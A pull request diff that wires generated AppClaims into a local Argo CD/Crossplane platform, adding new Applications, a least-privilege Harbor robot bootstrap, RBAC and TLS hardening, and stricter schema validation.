### PR TITLE
feat: deliver AppClaims through local GitOps

### DIFF
--- a/.github/requirements-platform-validation-py312-linux.txt
+++ b/.github/requirements-platform-validation-py312-linux.txt
@@ -1,0 +1,16 @@
+# GitHub Actions platform-validation dependencies.
+# Target: CPython 3.12 on ubuntu-latest (manylinux x86_64).
+PyYAML==6.0.3 \
+    --hash=sha256:ba1cc08a7ccde2d2ec775841541641e4548226580ab850948cbfda66a1befcdc
+attrs==26.1.0 \
+    --hash=sha256:c647aa4a12dfbad9333ca4e71fe62ddc36f4e63b2d260a37a8b83d2f043ac309
+jsonschema==4.25.1 \
+    --hash=sha256:3fba0169e345c7175110351d456342c364814cfcf3b964ba4587f22915230a63
+jsonschema-specifications==2025.9.1 \
+    --hash=sha256:98802fee3a11ee76ecaca44429fda8a41bff98b00a0f2838151b113f210cc6fe
+referencing==0.37.0 \
+    --hash=sha256:381329a9f99628c9069361716891d34ad94af76e461dcb0335825aecc7692231
+rpds-py==2026.6.3 \
+    --hash=sha256:ecabd69db66de867690f9797f2f8fa27ba501bbc24540cbdbdc649cd15888ba6
+typing-extensions==4.16.0 \
+    --hash=sha256:481caa481374e813c1b176ada14e97f1f67a4539ce9cfeb3f350d78d6370c2e8

--- a/.github/workflows/platform-validation.yml
+++ b/.github/workflows/platform-validation.yml
@@ -34,10 +34,9 @@ jobs:
         with:
           python-version: "3.12"
 
-      - name: Install PyYAML
+      - name: Install Python test dependencies
         run: |
-          printf '%s\n' 'PyYAML==6.0.3 --hash=sha256:ba1cc08a7ccde2d2ec775841541641e4548226580ab850948cbfda66a1befcdc' > /tmp/pyyaml-requirements.txt
-          python3 -m pip install --disable-pip-version-check --only-binary=:all: --require-hashes -r /tmp/pyyaml-requirements.txt
+          python3 -m pip install --disable-pip-version-check --only-binary=:all: --require-hashes -r .github/requirements-platform-validation-py312-linux.txt
 
       - name: Pin policy (reject floating / unpinned references)
         run: python3 scripts/check_pins.py

--- a/apps/README.md
+++ b/apps/README.md
@@ -4,22 +4,23 @@ This directory contains the Argo CD `Application` manifests managed by the root 
 
 ## Application inventory
 
-There are **27 child Applications** under `apps/platform/`. Their sync-wave annotations are ordering metadata; they do not prove that a dependency in another Application is functionally ready.
+There are **31 child Applications** under `apps/platform/`. Their sync-wave annotations are ordering metadata; they do not prove that a dependency in another Application is functionally ready.
 
 | Wave | Applications | Runtime contract |
 |---|---|---|
 | -1 | namespaces | Pre-creates all platform namespaces |
 | 0 | cert-manager, external-secrets, nats, opensearch, postgresql | Foundation and permanent core data layer |
-| 1 | argocd, keycloak | GitOps and identity |
+| 1 | argocd, keycloak, nats-jetstream-controller | GitOps, identity, and the authenticated JetStream reconciler |
 | 2 | backstage, gitea, grafana, harbor, jaeger, landingpage, opencost, sonarqube | Platform services |
 | 3 | crossplane, kyverno | Infrastructure and policy engines |
-| 4 | crossplane-providers, fluentd, kyverno-policies | Providers, log shipping, and policies |
+| 4 | crossplane-providers, fluentd, gitea-actions-runner, kyverno-policies | Providers, CI runner, log shipping, and policies |
 | 5 | monitoring-extras | Additional monitoring resources |
 | 6 | crossplane-provider-configs | Provider configuration |
-| 7 | crossplane-xrds | Composite Resource Definitions |
+| 7 | crossplane-harbor-bootstrap, crossplane-xrds | Harbor's provider-http bootstrap is manually promoted only after provider-http is Healthy and its Request CRD is Established; XRDS follow their provider configuration |
 | 8 | core-catalog | Core catalog |
 | 9 | cnpg | **Manual** optional future-app database operator |
 | 10 | cnpg-cluster | **Manual** optional future-app database Cluster |
+| 11 | app-config | Private Gitea AppClaim GitOps source |
 
 Ingress is not an Argo CD Application; the local setup script applies it during bootstrap.
 
@@ -28,8 +29,8 @@ Ingress is not an Argo CD Application; the local setup script applies it during 
 1. `nu scripts/local-setup.nu up` creates the KinD cluster, ingress, CoreDNS, bootstrap Secrets, and Argo CD.
 2. Before the root App exists, the script directly applies the PostgreSQL and OpenSearch Applications.
 3. It proves PostgreSQL over its real Service DNS/TCP path, authenticates every platform role, checks database/schema access, and verifies OpenSearch through its Service.
-4. Only then does the script apply the root App, which creates all 27 child Application CRs.
-5. The normal `up` path synchronizes and waits for the **25 core Applications**. The two CNPG Applications remain manual and cannot delay or fail core bootstrap.
+4. Only then does the script apply the root App, which creates all 31 child Application CRs.
+5. The normal `up` path synchronizes and waits for the **29 core Applications**. The two CNPG Applications remain manual and cannot delay or fail core bootstrap. The Harbor bootstrap is also manual in Argo CD, but `up` promotes it explicitly after provider-http readiness is proven.
 6. Optional future hosted-application database infrastructure is promoted explicitly with:
 
 ```bash

--- a/apps/platform/app-config.yaml
+++ b/apps/platform/app-config.yaml
@@ -1,0 +1,66 @@
+# Issue #285: the GitOps reconciliation contract for generated AppClaim
+# manifests. Backstage's `create-pull-request` step (core-portal, already
+# independently tested and configured with a Gitea publish target) opens PRs
+# against the private DigiOrg/app-config repository's `claims/` directory
+# (core-portal app-config.yaml: kubernetesIngestor.crossplane.xrds.publishPhase.git.targetPath
+# -- this path MUST match that value exactly); merging a PR here is what
+# actually creates the AppClaim in-cluster — the missing link the issue's P0
+# evidence identified ("no declared GitOps sink exists for generated
+# manifests"). Read access is a dedicated, least-privilege Gitea identity
+# (scripts/local-setup.nu: configure_argocd_gitea_access), never the Gitea
+# platform-admin bootstrap token, and is a wholly separate concern from the
+# per-app Gitea SOURCE repository the AppClaim Composition itself provisions
+# (core-catalog/compositions/local/pipeline.yaml).
+#
+# repoURL (Issue #285 TLS hardening) goes through the trusted digiorg.local
+# ingress over HTTPS (CA: cert-manager/digiorg-local-ca-secret), not the raw
+# in-cluster Gitea Service address over plain HTTP. ArgoCD's repo-server
+# trusts that CA via configs.tls.certificates (scripts/local-setup.nu
+# patch_argocd_oidc_ca). This matches core-portal's own (already tested)
+# Gitea integration and the pipeline Composition's own giteaApiBase, both of
+# which now also talk to Gitea only through this same trusted ingress.
+apiVersion: argoproj.io/v1alpha1
+kind: Application
+metadata:
+  name: app-config
+  namespace: argocd
+  finalizers:
+    - resources-finalizer.argocd.argoproj.io
+  annotations:
+    # Wave 11: after crossplane-xrds (wave 7, the AppClaim CRD) and
+    # core-catalog (wave 8, the rendering Composition) are reconciled. Placed
+    # after the optional, manually-synced cnpg/cnpg-cluster (waves 9-10) too,
+    # so an AppClaim requesting database.enabled never races the CNPG
+    # prerequisite the Composition itself fails closed on.
+    argocd.argoproj.io/sync-wave: "11"
+spec:
+  project: default
+
+  source:
+    repoURL: https://digiorg.local/gitea/DigiOrg/app-config.git
+    targetRevision: main
+    path: claims
+    directory:
+      recurse: true
+      include: '*.yaml'
+
+  destination:
+    server: https://kubernetes.default.svc
+    # Fixed claims-hosting namespace (platform/base/namespaces/namespaces.yaml)
+    # -- see the comment there for why AppClaims live here rather than in the
+    # per-app namespace their own Composition creates.
+    namespace: app-claims
+
+  syncPolicy:
+    automated:
+      selfHeal: true
+      prune: true
+    syncOptions:
+      - CreateNamespace=true
+      - ServerSideApply=true
+    retry:
+      limit: 5
+      backoff:
+        duration: 10s
+        factor: 2
+        maxDuration: 3m

--- a/apps/platform/core-catalog.yaml
+++ b/apps/platform/core-catalog.yaml
@@ -14,14 +14,13 @@ spec:
 
   source:
     repoURL: https://github.com/digiorg/core-catalog.git
-    # Crossplane v2 removed native `spec.resources` Compositions; the local
-    # catalog was migrated to function-patch-and-transform Pipeline mode in
-    # core-catalog PR #17. Pin the canonical *reviewed merge* commit of that PR
-    # (Issue #281 Phase 4). It is one commit ahead of the earlier implementation
-    # SHA (4c30d9c3…) with NO changed files, and core-catalog/main points at it;
-    # pinning the merge commit makes the deployed revision traceable to review.
+    # Issue #285 replaces the competing local Compositions with one deterministic
+    # KCL pipeline in core-catalog PR #18. Pin its exact independently reviewed
+    # head so Core and Catalog are deployed as one immutable integration. If the
+    # PR is squash/rebase merged, advance this to the resulting canonical commit
+    # before merging the Core PR.
     # Keep this manual (no syncPolicy.automated) — see docs/guides/platform-versions.md.
-    targetRevision: 13b7a3b4a0b7a5f5e692dc6d5a3fa416852c4273
+    targetRevision: 7fd51323db2c38e7ca36f5496e22686a93aa9fc4
     path: compositions/local
 
   destination:

--- a/apps/platform/crossplane-harbor-bootstrap.yaml
+++ b/apps/platform/crossplane-harbor-bootstrap.yaml
@@ -23,9 +23,8 @@ spec:
     namespace: crossplane-system
 
   syncPolicy:
-    automated:
-      selfHeal: true
-      prune: true
+    # Deliberately manual: local-setup promotes this only after provider-http's
+    # active ProviderRevision is Healthy and its Request CRD is Established.
     syncOptions:
       - CreateNamespace=true
       - ServerSideApply=true

--- a/apps/platform/crossplane-harbor-bootstrap.yaml
+++ b/apps/platform/crossplane-harbor-bootstrap.yaml
@@ -1,0 +1,37 @@
+apiVersion: argoproj.io/v1alpha1
+kind: Application
+metadata:
+  name: crossplane-harbor-bootstrap
+  namespace: argocd
+  finalizers:
+    - resources-finalizer.argocd.argoproj.io
+  annotations:
+    # Wave 7: same wave as crossplane-xrds. Needs provider-http's `default`
+    # ProviderConfig (crossplane-provider-configs, wave 6) and the Harbor
+    # Application (wave 2) to already be reconciled; independent of the XRDs.
+    argocd.argoproj.io/sync-wave: "7"
+spec:
+  project: default
+
+  source:
+    repoURL: https://github.com/digiorg/core.git
+    targetRevision: main
+    path: crossplane/bootstrap
+
+  destination:
+    server: https://kubernetes.default.svc
+    namespace: crossplane-system
+
+  syncPolicy:
+    automated:
+      selfHeal: true
+      prune: true
+    syncOptions:
+      - CreateNamespace=true
+      - ServerSideApply=true
+    retry:
+      limit: 5
+      backoff:
+        duration: 10s
+        factor: 2
+        maxDuration: 3m

--- a/apps/platform/gitea-actions-runner.yaml
+++ b/apps/platform/gitea-actions-runner.yaml
@@ -1,0 +1,43 @@
+apiVersion: argoproj.io/v1alpha1
+kind: Application
+metadata:
+  name: gitea-actions-runner
+  namespace: argocd
+  finalizers:
+    - resources-finalizer.argocd.argoproj.io
+  annotations:
+    # Wave 4: alongside crossplane-providers/fluentd/kyverno-policies, after
+    # Gitea itself (wave 2). Its registration-token Secret
+    # (gitea-actions-runner-token, gitea namespace) is created imperatively
+    # by scripts/local-setup.nu configure_gitea_actions_runner during Phase 3
+    # (configure_gitea), which always completes before the final Phase 6
+    # convergence gate. The pod harmlessly sits in CreateContainerConfigError
+    # for the short window before that Secret exists -- the same tolerated
+    # pattern already used by every other Phase-3-provisioned Secret in this
+    # platform (e.g. crossplane-gitea-credentials, app-config-repo-creds).
+    argocd.argoproj.io/sync-wave: "4"
+spec:
+  project: default
+
+  source:
+    repoURL: https://github.com/digiorg/core.git
+    targetRevision: main
+    path: platform/base/gitea-actions-runner
+
+  destination:
+    server: https://kubernetes.default.svc
+    namespace: gitea
+
+  syncPolicy:
+    automated:
+      selfHeal: true
+      prune: true
+    syncOptions:
+      - CreateNamespace=true
+      - ServerSideApply=true
+    retry:
+      limit: 5
+      backoff:
+        duration: 10s
+        factor: 2
+        maxDuration: 3m

--- a/apps/platform/nats-jetstream-controller.yaml
+++ b/apps/platform/nats-jetstream-controller.yaml
@@ -34,10 +34,37 @@ spec:
       releaseName: nats-jetstream-controller
       values: |
         namespaced: false
+        # The chart default grants cluster-wide get/list/watch on every Secret.
+        # NACK only needs the seed through a Kubelet-projected volume, so retain
+        # event writes and JetStream CRD reconciliation but remove Secret API access.
+        rbacRules: |
+          rules:
+            - apiGroups: [""]
+              resources: ["events"]
+              verbs: ["create", "update", "patch"]
+            - apiGroups: ["jetstream.nats.io"]
+              resources:
+                - streams
+                - streams/status
+                - objectstores
+                - objectstores/status
+                - keyvalues
+                - keyvalues/status
+                - consumers
+                - consumers/status
+                - streamtemplates
+                - streamtemplates/status
+                - accounts
+                - accounts/status
+              verbs: ["create", "get", "list", "watch", "patch", "update", "delete"]
         jetstream:
           enabled: true
           nats:
             url: "nats://nats.messaging.svc.cluster.local:4222"
+            nkey:
+              secret:
+                name: nats-jetstream-controller-nkey
+                key: seed.nk
           controlLoop: false
         resources:
           requests:

--- a/apps/platform/nats-jetstream-controller.yaml
+++ b/apps/platform/nats-jetstream-controller.yaml
@@ -1,0 +1,66 @@
+# =============================================================================
+# NACK (NATS Controller for Kubernetes) - JetStream Controller
+#
+# Issue #285 architecture decision #4: messaging means managed NATS JetStream
+# Stream/Consumer resources. The core-catalog pipeline Composition renders
+# jetstream.nats.io/v1beta2 Stream/Consumer objects per AppClaim; this
+# controller (NACK) is what actually reconciles those CRs against the
+# platform's NATS server. Without it, Stream/Consumer objects would sit
+# unreconciled in the cluster forever.
+# =============================================================================
+apiVersion: argoproj.io/v1alpha1
+kind: Application
+metadata:
+  name: nats-jetstream-controller
+  namespace: argocd
+  finalizers:
+    - resources-finalizer.argocd.argoproj.io
+  annotations:
+    # Wave 1: only needs NATS (wave 0) reachable at the Service DNS name; the
+    # controller retries its own connection, so it does not gate core bootstrap.
+    argocd.argoproj.io/sync-wave: "1"
+spec:
+  project: default
+
+  source:
+    repoURL: https://nats-io.github.io/k8s/helm/charts
+    chart: nack
+    # Revalidated 2026-07-21 against https://nats-io.github.io/k8s/helm/charts/index.yaml.
+    # jetstream.image.tag 0.23.0 (bundled in this chart version) matches the
+    # jetstream.nats.io/v1beta2 CRD contract the pipeline Composition renders
+    # against (nats-io/nack v0.23.0 deploy/crds.yml).
+    targetRevision: "0.34.0"
+    helm:
+      releaseName: nats-jetstream-controller
+      values: |
+        namespaced: false
+        jetstream:
+          enabled: true
+          nats:
+            url: "nats://nats.messaging.svc.cluster.local:4222"
+          controlLoop: false
+        resources:
+          requests:
+            cpu: 25m
+            memory: 32Mi
+          limits:
+            cpu: 100m
+            memory: 128Mi
+
+  destination:
+    server: https://kubernetes.default.svc
+    namespace: messaging
+
+  syncPolicy:
+    automated:
+      selfHeal: true
+      prune: true
+    syncOptions:
+      - CreateNamespace=true
+      - ServerSideApply=true
+    retry:
+      limit: 5
+      backoff:
+        duration: 5s
+        factor: 2
+        maxDuration: 3m

--- a/crossplane/bootstrap/harbor-robot-request.yaml
+++ b/crossplane/bootstrap/harbor-robot-request.yaml
@@ -1,0 +1,202 @@
+# Issue #285 architecture decision #5: a least-privilege Harbor identity for
+# Crossplane's AppClaim pipeline to create per-app Harbor projects and their
+# scoped CI robot accounts. The Harbor admin credential itself (harbor-admin-secret)
+# is NEVER referenced by the AppClaim Composition — only this one-time,
+# declarative Request is, and only to mint the narrower "crossplane-system"
+# system robot below. This is provisioned exactly once (deletionPolicy: Orphan)
+# through the same pinned provider-http mechanism the Composition itself uses
+# (crossplane/providers/packages/provider-http.yaml, v1.0.14), reusing already
+# schema-verified machinery instead of a bespoke imperative bootstrap path.
+#
+# Harbor RBAC (validated against goharbor/harbor v2.15.1 — the appVersion
+# pinned by platform/base/harbor's chart — src/common/rbac/const.go and
+# src/controller/robot/controller.go convertScope/validatePermissions, which
+# document "/system => Kind: system Namespace: /" and "/project/* => Kind:
+# project Namespace: *" as the two permission shapes a *system*-level robot
+# may hold):
+#   - {kind: system,  namespace: "/", access: [{resource: project, action: create}]}
+#     grants ONLY the ability to create new Harbor projects; no delete, no
+#     user/registry/system configuration, no scanning administration.
+#   - {kind: project, namespace: "*", access: [{resource: robot, action: create|read}, {resource: artifact, action: read}]}
+#     grants creating/reading project-scoped robot accounts, and reading
+#     artifact metadata (digest/tags), across ALL projects (namespace: "*" is
+#     required because, at the moment this system robot creates a new
+#     per-app robot or checks a freshly-pushed artifact, that project's own
+#     robots cannot yet be relied on — a namespace-scoped grant naming one
+#     project cannot work here). Issue #285 (automatic image promotion):
+#     `artifact: read` is the exact permission goharbor/harbor v2.15.1
+#     src/server/v2.0/handler/artifact.go GetArtifact requires
+#     (`RequireProjectAccess(ctx, project, rbac.ActionRead,
+#     rbac.ResourceArtifact)`) — this is what lets the AppClaim pipeline
+#     Composition's per-service Harbor artifact Request confirm a
+#     CI-pushed, commit-SHA-tagged image exists (and read its digest) before
+#     promoting it into a Deployment. Deliberately NOT `repository: pull`
+#     (the docker-pull scope): that permission is reserved for the separate,
+#     narrower per-app pull-only robot used solely for the Deployment's
+#     imagePullSecrets, never for the control plane's own API reads.
+# This is strictly narrower than the Harbor admin credential: it cannot
+# delete anything, cannot manage users/registries/replication/GC, and cannot
+# push/pull images itself.
+apiVersion: http.crossplane.io/v1alpha2
+kind: Request
+metadata:
+  name: harbor-crossplane-system-robot
+spec:
+  deletionPolicy: Orphan
+  providerConfigRef:
+    name: default
+  forProvider:
+    headers:
+      Content-Type:
+        - application/json
+      Authorization:
+        - "Basic {{ harbor-admin-basic-auth:harbor:value }}"
+    payload:
+      # Issue #285 (TLS hardening): the trusted digiorg.local ingress, not
+      # the raw in-cluster harbor-core Service address. The shared
+      # provider-http ProviderConfig (crossplane/providers/configs/provider-
+      # http-config.yaml) carries spec.tls.caCertSecretRef for the CA this
+      # host's certificate chains to.
+      baseUrl: "https://digiorg.local/api/v2.0"
+      body: |
+        {
+          "name": "crossplane-system",
+          "description": "Issue 285: least-privilege system robot used by the AppClaim pipeline Composition (crossplane-contrib/provider-http) to create per-app Harbor projects and their CI robot accounts. Never reused as a per-app credential.",
+          "duration": -1,
+          "level": "system",
+          "permissions": [
+            {
+              "kind": "system",
+              "namespace": "/",
+              "access": [
+                {"resource": "project", "action": "create"}
+              ]
+            },
+            {
+              "kind": "project",
+              "namespace": "*",
+              "access": [
+                {"resource": "robot", "action": "create"},
+                {"resource": "robot", "action": "read"},
+                {"resource": "artifact", "action": "read"}
+              ]
+            }
+          ]
+        }
+    mappings:
+      - method: "POST"
+        action: CREATE
+        url: .payload.baseUrl + "/robots"
+        body: .payload.body
+      # Runtime blocker (crash-safe identity): a numeric-ID-based OBSERVE
+      # (GET /robots/{id} using an ID cached from a prior CREATE response)
+      # cannot rediscover this robot if the Request's .status is ever lost
+      # (e.g. the object is deleted and recreated after Harbor already
+      # accepted the CREATE POST) -- the cached ID is gone with it, and a
+      # fresh reconcile would fall through to CREATE again. Harbor's
+      # `GET /robots` LIST endpoint (goharbor/harbor v2.15.1
+      # src/server/v2.0/handler/robot.go ListRobot) defaults to system-level
+      # scope (ProjectID=0) whenever the `Level` query keyword is omitted --
+      # exactly this robot's own level, with no numeric project ID needed
+      # (unlike the AppClaim pipeline's per-app *project*-level robot, which
+      # Harbor's ListRobot forces to require a numeric ProjectID a single
+      # provider-http mapping cannot resolve -- see
+      # core-catalog/tests/test_harbor_robot_hardening.py). `q=Name=~...`
+      # is Harbor's fuzzy/substring query syntax (`#/parameters/query` in
+      # api/v2.0/swagger.yaml), robust to the admin-configurable "robot$"
+      # display prefix (populate() in the same handler file) this bootstrap
+      # robot's stored name always carries. `action: OBSERVE` is explicit
+      # for the same requestmapping.GetMapping reason documented in
+      # core-catalog/tests/test_provider_http_mapping_contract.py.
+      - method: "GET"
+        action: OBSERVE
+        url: .payload.baseUrl + "/robots?q=Name=~crossplane-system"
+    # Runtime blocker (crash-safe identity), continued: rather than trusting
+    # a bare 2xx status (the DEFAULT check), these CUSTOM checks verify the
+    # LIST response actually contains an item with this robot's exact
+    # intended identity (name suffix + level=system + both permission
+    # entries, nothing more/less) -- confirmed executable against gojq
+    # (itchyny/gojq v0.12.17) via `jq` locally in
+    # core/platform/tests/test_harbor_bootstrap_crash_safety.py. A
+    # mismatched/uncertain response (wrong permissions, empty list, non-200)
+    # is reported as both "not synced" and "not removed" -- it must never be
+    # silently trusted as up to date, but must also never be misreported as
+    # removed (that would re-trigger CREATE against a name Harbor's own
+    # `unique_robot UNIQUE(name, project_id)` constraint, confirmed via
+    # make/migrations/postgresql/0004_1.8.0_schema.up.sql, already holds).
+    isRemovedCheck:
+      type: CUSTOM
+      # Deliberately name/level-only (ignores permissions): a robot that
+      # already exists under this exact name but with drifted permissions
+      # must never be reported as "removed" (that would re-trigger CREATE
+      # against a name Harbor's own uniqueness constraint already holds --
+      # see the comment above expectedResponseCheck). Only a genuine absence
+      # (no matching name at all) counts as removed.
+      #
+      # Issue #285 review finding: negating the whole success predicate (the
+      # previous shape, `(200 and array and found) | not`) turned every
+      # error/malformed response (401, 500, a non-array body) into
+      # "removed", since `not` of a false success predicate is true whether
+      # that predicate failed because the robot was genuinely absent OR
+      # because the response was simply uninterpretable. An uncertain
+      # response must never be reported as removed -- only a confirmed HTTP
+      # 200, well-formed array that provably omits the robot counts. The AND
+      # chain below achieves that directly: it is only ever true when the
+      # 200/array preconditions hold AND the robot is absent from that
+      # array; any error/malformed case falls through to false (not
+      # removed), matching expectedResponseCheck's own fail-closed (not
+      # synced) behavior on the same inputs.
+      logic: |-
+        def isCrossplaneSystemRobotByName(r):
+          r.name != null and (r.name | endswith("crossplane-system")) and r.level == "system";
+        (.response.statusCode == 200) and ((.response.body|type)=="array") and (([.response.body[] | isCrossplaneSystemRobotByName(.)] | any) | not)
+    expectedResponseCheck:
+      type: CUSTOM
+      # Issue #285 review finding: exact least-privilege enforcement. Each
+      # `select(...)` previously only asserted the required actions were
+      # present via `any(...)`, never that the access array held *only*
+      # those actions -- so a drifted robot granted an extra action (e.g.
+      # `robot:delete`) alongside the required ones was silently trusted as
+      # synced. Each select now also pins `(.access // []) | length ==` the
+      # exact expected count, so any extra action fails the match (and the
+      # robot correctly falls through to "not synced").
+      logic: |-
+        def isCrossplaneSystemRobot(r):
+          r.name != null and (r.name | endswith("crossplane-system"))
+          and r.level == "system"
+          and (r.permissions // [] | length) == 2
+          and ([r.permissions[] | select(.kind=="system" and .namespace=="/" and ((.access // []) | length) == 1 and ((.access // []) | any(.resource=="project" and .action=="create")))] | length) == 1
+          and ([r.permissions[] | select(.kind=="project" and .namespace=="*" and ((.access // []) | length) == 3 and ((.access // []) | any(.resource=="robot" and .action=="create")) and ((.access // []) | any(.resource=="robot" and .action=="read")) and ((.access // []) | any(.resource=="artifact" and .action=="read")))] | length) == 1;
+        (.response.statusCode == 200) and ((.response.body|type)=="array") and ([.response.body[] | isCrossplaneSystemRobot(.)] | any)
+    secretInjectionConfigs:
+      - secretRef:
+          name: crossplane-harbor-credentials
+          namespace: crossplane-system
+        keyMappings:
+          # Plain field extraction for the raw robot identity/secret (parity
+          # with the AppClaim pipeline's per-app harbor-robot secret
+          # injection), plus one *computed* key: gojq (itchyny/gojq v0.12.17,
+          # provider-http's vendored jq engine — confirmed via its go.mod) is
+          # a full jq implementation, so `@base64` string-interpolation is
+          # valid here. provider-http's `{{ name:namespace:key }}` templating
+          # substitutes a secret value verbatim (it does not encode), and
+          # Harbor's own Basic-auth scheme requires base64(name:secret) — so
+          # the pre-encoded pair is computed once here rather than asking the
+          # AppClaim Composition to do HTTP-auth encoding it cannot perform.
+          #
+          # Runtime blocker (secret preservation): Harbor's OBSERVE response
+          # (a LIST, above) never carries `secret` (only CREATE's response
+          # does -- confirmed against goharbor/harbor v2.15.1's handler,
+          # which only ever populates `secret` on `CreateRobot`). Without
+          # `missingFieldStrategy: preserve` (default: "delete"), every
+          # OBSERVE reconcile after the first would delete the
+          # already-injected secret/basicAuth keys from this Secret.
+          - secretKey: name
+            responseJQ: .body.name
+            missingFieldStrategy: preserve
+          - secretKey: secret
+            responseJQ: .body.secret
+            missingFieldStrategy: preserve
+          - secretKey: basicAuth
+            responseJQ: "\"\\(.body.name):\\(.body.secret)\" | @base64"
+            missingFieldStrategy: preserve

--- a/crossplane/bootstrap/kustomization.yaml
+++ b/crossplane/bootstrap/kustomization.yaml
@@ -1,0 +1,8 @@
+apiVersion: kustomize.config.k8s.io/v1beta1
+kind: Kustomization
+resources:
+  # Issue #285: one-time, declarative bootstrap resources applied by the
+  # crossplane-harbor-bootstrap Application (apps/platform/crossplane-harbor-bootstrap.yaml).
+  # These are NOT part of the AppClaim pipeline Composition (core-catalog) —
+  # they provision the least-privilege identities that Composition depends on.
+  - harbor-robot-request.yaml

--- a/crossplane/providers/configs/provider-http-config.yaml
+++ b/crossplane/providers/configs/provider-http-config.yaml
@@ -5,3 +5,21 @@ metadata:
 spec:
   credentials:
     source: None
+  # Issue #285 (TLS hardening): every Request using this ProviderConfig
+  # (both core's bootstrap and core-catalog's AppClaim pipeline) talks to
+  # Gitea/Harbor through the trusted digiorg.local ingress over HTTPS.
+  # `spec.tls.caCertSecretRef` verified against the pinned v1.0.14 source
+  # (apis/cluster/v1alpha1/providerconfig_types.go: `TLS *common.TLSConfig`;
+  # apis/common/common.go: `CACertSecretRef *xpv1.SecretKeySelector`) --
+  # loaded via a live `kubeClient.Get` per reconcile
+  # (internal/clients/http/tls_loader.go), so a rotated CA is picked up
+  # automatically without restarting the provider. `digiorg-local-ca` in
+  # crossplane-system is a copy of only the public certificate
+  # (cert-manager/digiorg-local-ca-secret's ca.crt key, never its private
+  # key) that scripts/local-setup.nu keeps in sync
+  # (copy_digiorg_local_ca_to_namespace).
+  tls:
+    caCertSecretRef:
+      name: digiorg-local-ca
+      namespace: crossplane-system
+      key: ca.crt

--- a/crossplane/providers/packages/function-auto-ready.yaml
+++ b/crossplane/providers/packages/function-auto-ready.yaml
@@ -1,0 +1,11 @@
+apiVersion: pkg.crossplane.io/v1beta1
+kind: Function
+metadata:
+  name: function-auto-ready
+spec:
+  # Issue #285: paired with function-kcl (same pipeline) so composed Object/
+  # Request resources get real per-resource readiness checks instead of the
+  # composite's Ready condition defaulting to unready forever. v0.7.0 is the
+  # latest crossplane-contrib release. Revalidated 2026-07-21 against
+  # https://github.com/crossplane-contrib/function-auto-ready/releases.
+  package: xpkg.upbound.io/crossplane-contrib/function-auto-ready:v0.7.0

--- a/crossplane/providers/packages/function-kcl.yaml
+++ b/crossplane/providers/packages/function-kcl.yaml
@@ -1,0 +1,13 @@
+apiVersion: pkg.crossplane.io/v1beta1
+kind: Function
+metadata:
+  name: function-kcl
+spec:
+  # Issue #285: one deterministic Pipeline Composition needs a function
+  # capable of conditional/iterative resource generation (patch-and-transform
+  # alone cannot loop over spec.services[]/spec.messaging.subjects[] or branch
+  # on spec.database.enabled). v0.12.2 is the latest crossplane-contrib
+  # release; its go.mod pins kcl-lang.io/cli v0.12.7, which core-catalog's
+  # render test harness (tests/render_harness.py) also pins for parity.
+  # Revalidated 2026-07-21 against https://github.com/crossplane-contrib/function-kcl/releases.
+  package: xpkg.upbound.io/crossplane-contrib/function-kcl:v0.12.2

--- a/crossplane/providers/packages/kustomization.yaml
+++ b/crossplane/providers/packages/kustomization.yaml
@@ -6,3 +6,5 @@ resources:
   - provider-helm.yaml
   - provider-http.yaml
   - function-patch-and-transform.yaml
+  - function-kcl.yaml
+  - function-auto-ready.yaml

--- a/crossplane/providers/packages/provider-kubernetes.yaml
+++ b/crossplane/providers/packages/provider-kubernetes.yaml
@@ -24,6 +24,12 @@ spec:
           serviceAccountName: crossplane-provider-kubernetes
           containers:
             - name: package-runtime
+              # Issue #285: Object observations of Kubernetes Secrets must not
+              # copy credential-bearing data into status.atProvider.manifest.
+              # provider-kubernetes v1.2.1 defaults this protection to false.
+              env:
+                - name: SANITIZE_SECRETS
+                  value: "true"
 ---
 apiVersion: v1
 kind: ServiceAccount

--- a/crossplane/xrds/application.yaml
+++ b/crossplane/xrds/application.yaml
@@ -54,7 +54,9 @@ spec:
                     properties:
                       name:
                         type: string
-                        description: "Service name"
+                        pattern: '^[a-z0-9]([-a-z0-9]*[a-z0-9])?$'
+                        maxLength: 63
+                        description: "RFC 1123 DNS label (lowercase alphanumeric and '-', max 63 chars) -- used verbatim as a Kubernetes object name, CI job key, and Harbor image path segment."
                       image:
                         type: string
                         description: "Container image reference"
@@ -68,6 +70,19 @@ spec:
                         minimum: 1
                         default: 1
                         description: "Override replica count (size preset applies if omitted)"
+                      build:
+                        type: object
+                        description: "Issue #285: opt this service into the platform's Gitea Actions CI build/push pipeline (requires spec.gitea.enabled and spec.gitea.cicd). When enabled, CI builds an immutable commit-SHA-tagged image from this service's build context and pushes it to Harbor at <harborRegistry>/<appName>/<service name>:<commit sha>; the pipeline Composition then automatically promotes that exact commit's Harbor artifact digest into this service's Deployment (status.services[]) once confirmed -- this service's `image` field is never read once build.enabled is true, and no Deployment renders until the first digest resolves. Services that omit this (or set enabled: false) are assumed to reference an already-published, externally-built image (spec.services[].image is used verbatim) and are never included in the generated CI workflow."
+                        properties:
+                          enabled:
+                            type: boolean
+                            default: false
+                          context:
+                            type: string
+                            default: "."
+                            maxLength: 255
+                            pattern: '^\.$|^[A-Za-z0-9_][A-Za-z0-9_-]*(/[A-Za-z0-9_][A-Za-z0-9_-]*)*$'
+                            description: "Docker build context, relative to the Gitea source repository root (must contain a Dockerfile). Must be a relative path of safe segments only -- no leading '/', no '..', no whitespace or shell metacharacters -- since it is rendered into a generated CI workflow's shell command."
                 gitea:
                   type: object
                   properties:
@@ -90,9 +105,13 @@ spec:
                       default: false
                     subjects:
                       type: array
+                      uniqueItems: true
                       items:
                         type: string
-                      description: "NATS subjects (e.g. my-app.events.>)"
+                        maxLength: 255
+                        pattern: '^[A-Za-z][A-Za-z0-9_-]*(\.[A-Za-z0-9_-]+)*(\.>)?$'
+                        description: "NATS subject (e.g. my-app.events.>). Dot-separated tokens of letters/digits/'_'/'-'; the wildcard '>' may only appear as the final, whole token."
+                      description: "NATS subjects. Distinct entries are never rejected as duplicates merely because they'd collide after case/separator normalization -- see core-catalog's pipeline Composition for how Stream/Consumer identifiers stay collision-safe."
             status:
               type: object
               properties:
@@ -102,3 +121,21 @@ spec:
                 message:
                   type: string
                   description: "Human-readable status message"
+                services:
+                  type: array
+                  description: "Issue #285: automatic immutable image promotion. One entry per spec.services[] with build.enabled: true, populated by the pipeline Composition (function-kcl dxr status patch) once Crossplane has observed a Harbor artifact matching Gitea's main branch HEAD commit for that service. A pending later HEAD (build not yet pushed) never clears an already-promoted entry -- digest/headSha keep the last successfully promoted values until a newer one is confirmed."
+                  items:
+                    type: object
+                    properties:
+                      name:
+                        type: string
+                        description: "spec.services[].name this entry promotes"
